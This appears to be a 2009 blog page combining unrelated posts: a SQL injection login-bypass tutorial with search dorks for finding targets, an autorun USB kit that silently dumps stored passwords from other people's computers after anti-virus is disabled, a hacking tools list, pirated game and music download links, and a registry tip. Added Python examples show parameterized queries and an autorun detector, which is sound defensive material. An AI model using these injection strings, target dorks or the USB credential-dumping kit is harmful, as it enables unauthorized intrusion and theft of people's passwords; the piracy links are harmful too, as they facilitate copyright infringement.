Friday, December 18, 2009

list of sql injection strings

One of the major security problems with SQL-backed sites is how they handle login and URL strings. This tutorial is not going to go into detail on why these strings work, as all these details have been given in my previous article, Top 10 Tricks to exploit SQL Server Systems.

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

With these two search strings you will have plenty of targets to choose from… choose one that is vulnerable.

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user: admin (you don't even have to put this)
pass: ' or 1=1--

or

user: ' or 1=1--
admin: ' or 1=1--

Some sites will have just a password so

password: ' or 1=1--

In fact, I have compiled a combo list with strings like this to use on my chosen targets. There are plenty of strings in the list below. There are many other strings involving, for instance, UNION table access via reading the table structure from the error pages; an attack with this method will eventually reveal admin U\P paths.

The ones I am interested in are those that give quick access to targets.

PROGRAM

I tried several programs to use with these search strings, and up to now only Ares has performed well, with quite a bit of success with a combo list formatted this way. Yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes. How long would it take to go through 40 sites cutting and pasting each string?

combo example:

admin: ' or a=a--
admin: ' or 1=1--

And so on. You don't have to be admin and still can do anything you want. The most important part is example: ' or 1=1-- (this is our basic injection string).

Now the only tedious part is finding targets to exploit. So I tend to search, say, Google for login.asp or whatever:

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets; trying various searches spews out plenty more.

Now, using a proxy set in my browser, I click through interesting targets, seeing what's what on the site pages. If a site is interesting, I then cut and paste its URL as a possible target. After an hour or so you have a list of potential target sites like so:

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list, because I don't select all results or spider for login pages. I then save the list, fire up Ares and enter:

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I don't want to go into problems with users using Ares. The thing is, I know it works for me…

Sit back and wait. Any vulnerable target will show up in the hits box. Now, when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is, you know you CAN access the site. Really, I need a program that will return the hit with a click on the URL and ignore false outputs. I am still looking for it. This would save quite a bit of time going to each site and each string to find it's not exploitable.

There you go you should have access to your vulnerable target by now

Another thing: you can use the strings in URLs where user=? appears. Edit the URL up to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- which is just as quick as the login process.
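Why the basic string above gets past a login form or a user= URL parameter, and what closes the hole, shown as an added example that is not part of the original post. It assumes a login page that builds its query by string concatenation; SQLite stands in for the SQL Server back end, and the table, account and function names are hypothetical.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-demo-salt"  # constructed; use a random per-user salt in practice

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 10_000)

def make_db():
    """In-memory database holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users "
               "(username TEXT PRIMARY KEY, password TEXT, pw_hash BLOB)")
    # The plaintext column exists only so the legacy query can be shown.
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", "S3cret-constructed", pw_hash("S3cret-constructed")))
    return db

def legacy_query(username, password):
    """Query text as a string-concatenating login page would build it."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_concatenated(db, username, password):
    # Vulnerable: a quote in the input ends the string literal, the rest of
    # the input is parsed as SQL, and "--" comments out whatever follows.
    return db.execute(legacy_query(username, password)).fetchone() is not None

def login_parameterized(db, username, password):
    # Hardened: input is bound as data and never parsed as SQL; the password
    # is checked against a salted hash with a constant-time comparison.
    row = db.execute("SELECT pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], pw_hash(password))

def lookup_concatenated(db, user):
    # The same flaw reached through a URL parameter such as ?user=...
    sql = "SELECT username FROM users WHERE username = '" + user + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user):
    return db.execute("SELECT username FROM users WHERE username = ?",
                      (user,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print(legacy_query("admin", payload))
    print("concatenated login accepts it: ", login_concatenated(db, "admin", payload))
    print("parameterized login accepts it:", login_parameterized(db, "admin", payload))
    print("concatenated lookup returns:   ", lookup_concatenated(db, payload))
    print("parameterized lookup returns:  ", lookup_parameterized(db, payload))
```

In the concatenated query the WHERE clause becomes `(username = 'admin' AND password = '') or 1=1`, which is true for every row; with bound parameters the same input is just a password that matches nothing.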

Combo List

There are a lot of other variations of the injection string which I cannot put on my blog because that is illegal. If you are interested I can send it to you through email. Just write your email address in a comment and I will send it to you as early as possible, but you need to remain patient; it may take 1 or 2 days.

Happy Hunting

top 10 hacking tools

This is the Collection of Best Windows Hacking Tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely displays all active sessions on a device, and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network Swiss Army Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using the TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.


usb hack

Hello Friends,

Have you ever thought that a simple USB drive can be used as a destructive tool for hacking passwords? Today I will show you how to hack passwords using a USB pen drive.

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places.

Using these tools and a USB pendrive, you can create your own rootkit to hack passwords from your friend's/college computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE PassView: IE PassView is a small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 – v6.0.

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your Anti-Virus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

i.e., copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad as autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad as launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps:

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista.
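A defender-side check for the drive layout described above, as an added example that is not part of the original post: it audits the root of a mounted removable drive for an autorun.inf that launches a script and for batch files that dump tool output with /stext. The function names and the files written by build_sample are constructed for illustration and contain no executables.

```python
import os
import re
import tempfile

SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1")
# "/stext <file>" is the switch the post's launch.bat uses to write results to text.
DUMP_SWITCH = re.compile(r"\s/stext\s+\S+", re.IGNORECASE)

def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def audit_drive(root):
    """List reasons the drive root looks like an autorun credential dumper."""
    findings = []
    inf = next((f for f in os.listdir(root) if f.lower() == "autorun.inf"), None)
    if inf:
        with open(os.path.join(root, inf), errors="replace") as fh:
            entries = parse_autorun(fh.read())
        for key in ("open", "shellexecute"):
            target = entries.get(key, "")
            if target.lower().split(" ")[0].endswith(SCRIPT_EXT):
                findings.append(f"autorun.inf {key}= launches script: {target}")
        if "action" in entries:
            # The action text is what the user sees in the AutoPlay dialog.
            findings.append(f"autorun.inf sets AutoPlay label: {entries['action']!r}")
    for name in sorted(os.listdir(root)):
        if name.lower().endswith((".bat", ".cmd")):
            with open(os.path.join(root, name), errors="replace") as fh:
                hits = [ln for ln in fh if DUMP_SWITCH.search(ln)]
            if hits:
                findings.append(f"{name}: {len(hits)} command(s) write output with /stext")
    return findings

def build_sample(root):
    # Constructed sample mirroring the two text files described in the post.
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write("[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n")
    with open(os.path.join(root, "launch.bat"), "w") as fh:
        fh.write("start mspass.exe /stext mspass.txt\n"
                 "start iepv.exe /stext iepv.txt\n")

def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return audit_drive(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Disabling AutoRun for removable media (the NoDriveTypeAutoRun policy) removes the trigger this layout depends on, and keeping anti-virus enabled matters because the post's own note says it has to be switched off for the tools to be copied.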

Disclaimer: I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords

Saturday, July 18, 2009

3d table tennis game

Table tennis 3d (2009/GER)



Table Tennis 3D Simulator / Tischtennis Simulator 3D (2009/GER)


Description:
Playing this table tennis simulator, you feel like a professional player in professional matches. Select your own player and fight through “sweat and blood” to the peak of glory. The different match venues simply captivate with their atmosphere in this surprising game. By beating opponents you can upgrade your clothing and buy more advanced equipment. Realistic physics, detailed graphics, fast ball movement, lots of different equipment and exciting game maneuvers make this game an enormous pleasure for all table tennis fans!

System requirements:
# Pentium 1.2 GHz processor or higher
# DirectX 9.0c-capable graphics card with 256 MB of video memory
# DirectX 9.0c-capable sound card
# 256 MB RAM
# DVD or CD-ROM drive
# 700 MB of free hard disk space
# Optional gamepad
# Windows version: XP (SP2)/Vista





Code:
http://rapidshare.com/files/19282828...M.TR.part1.rar
Code:
http://rapidshare.com/files/19301718...M.TR.part2.rar
Code:
http://rapidshare.com/files/19304427...M.TR.part3.rar
Code:
http://rapidshare.com/files/19306971...M.TR.part4.rar
Code:
http://rapidshare.com/files/19309653...M.TR.part5.rar
Code:
http://rapidshare.com/files/19310798...M.TR.part6.rar

Thursday, July 16, 2009

Linkin Park - Complete Discography (2000 - 2009)

Linkin Park - New Divide (2009)

Download~

Linkin Park - Lockjaw (2009) [Instrumental from LP]

Download~

Minutes To Midnight (2007)

Code:
1. Wake
2. Given Up
3. Leave Out All The Rest
4. Bleed It Out
5. Shadow Of The Day
6. What I've Done
7. Hands Held High
8. No More Sorrow
9. Valentine's Day
10. In Between
11. In Pieces
12. The Little Things Give You Away
Download~

Code:
http://rapidshare.com/files/233385818/midnight.rar

OR

http://www.filehostme.com/9upb794ndhx7.html

Meteora (2003)

Code:
1. Foreword
2. Don't Stay
3. Somewhere I Belong
4. Lying From You
5. Hit The Floor
6. Easier To Run
7. Faint
8. Figure.09
9. Breaking The Habit
10. From The Inside
11. Nobody's Listening
12. Session
13. Numb
Download~

Code:
http://rapidshare.com/files/233381054/Meteora.rar

OR

http://www.filehostme.com/g1duqwvs7ip3.html

Hybrid Theory (2000)

Code:
1. Papercut
2. One Step Closer
3. With You
4. Points of Authority
5. Crawling
6. Runaway
7. By Myself
8. In The End
9. A Place For My Head
10. Forgotten
11. Cure For The Itch
12. Pushing Me Away
Download~

Code:
http://rapidshare.com/files/233375436/H.T.rar

OR

http://www.filehostme.com/cp4i5wavi170.html

Remixes~

Linkin Park - Songs From The Underground (2008)

Code:
Tracklist:
1. Announcement Service Public
2. Qwerty (Studio Version)
3. And One
4. Sold My Soul To Yo Mama
5. Dedicated (Demo 1999)
6. Hunger Strike (Live from Projekt Revolution 2008) - Chris Cornell feat. Chester Bennington
7. My December (Live 2008)
8. Part of Me

Size: ~52MB
Download~

Code:
http://www.filehostme.com/k6tlinvbuhsv.html

OR

http://rapidshare.com/files/225551558/LP-SFTU08.rar

Linkin Park FT Jay-Z Numb Encore New Version (2008)

Download~

Code:
http://rapidshare.com/files/134987572/Numb_Encore_Remix_2008.mp3

Jay-Z and Linkin Park - Collision Course (2004)

Code:
1. Dirt off Your Shoulder/Lying from You
2. Big Pimpin'/Papercut
3. Jigga What/Faint
4. Numb/Encore
5. Izzo/In the End
6. Points of Authority/99 Problems/One Step Closer
Download~

Code:
http://rapidshare.com/files/174166830/Collision_Course.rar

OR

http://www.megaupload.com/?d=9WU0WG80

Linkin Park - Piano Instrumentals (2006)

Code:
01. Faint
02. In the End
03. Krawling
04. Lying from you
05. Numb
06. breaking the habit
07. Easier to Run
08. Krawling (remix)
09. Paper cut
10. Pushing me away
Download~

Linkin Park - Live In Texas (2003)

Code:
01 Somewhere I Belong
02 Lying From You
03 Papercut
04 Points Of Authority
05 Runaway
06 Faint
07 From The Inside
08 P5hng Me A*wy
09 Numb
10 Crawling
11 In The End
12 One Step Closer
Download~

Code:
http://rapidshare.com/files/199756023/LP.Texas.rar
pw: tiedye3560

Linkin Park - Reanimation (2002)

Code:
1. Opening
2. Pts.Of.Athrty
3. Enth E Nd
4. (Chali)
5. Frgt/10
6. P5hng Me A*wy
7. Plc.4 Mie Haed
8. X-ecutioner Style
9. H! Vltg3
10. (Riff Raff)
11. Wth>You
12. PPr:Kut
13. Rnw@y
14. My{Dsmbr
15. (Stef)
16. By_Myslf
17. Kyur4 Th Ich
18. 1stp Klosr
19. Krwlng
Download~

Code:
http://hotfile.com/dl/2010719/273677f/Linkin_Park-Reanimation-2002-SER.zip.html

In The End : Live & Rare - Linkin Park

Code:
1. In the End (Album Version) - 3:36
2. Papercut (Live at Docklands Arena, London) - 3:12
3. Points Of Authority (Live at Docklands Arena, London) - 3:29
4. A Place For My Head (Live at Docklands Arena, London) - 3:10
5. Step Up (1999 Demo) - 3:54
6. My December - 4:20
7. High Voltage (2000 Reprise) - 3:45
Download~

__________________

Friday, July 10, 2009

Create Your Own Logon Message

You can create a message that will appear when you log on to your computer.

Click Start, click Run, type regedit, and then click OK.

In the Registry Editor, drill down to the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Right-click LegalNoticeCaption, click Modify, type My Windows XP Machine, and then click OK.

Right-click LegalNoticeText, click Modify, and then type your message.

Close the editor and your new message will appear at every log on.

This tip applies to computers that are part of a domain. For stand-alone or peer-to-peer networks, the custom screen appears just before the Welcome screen.

You may need to have an administrator account on your computer to make changes to the registry. Incorrectly editing the registry may severely damage your system. At the very least, you should back up any valued data on the computer before making changes to the registry.

Enjoy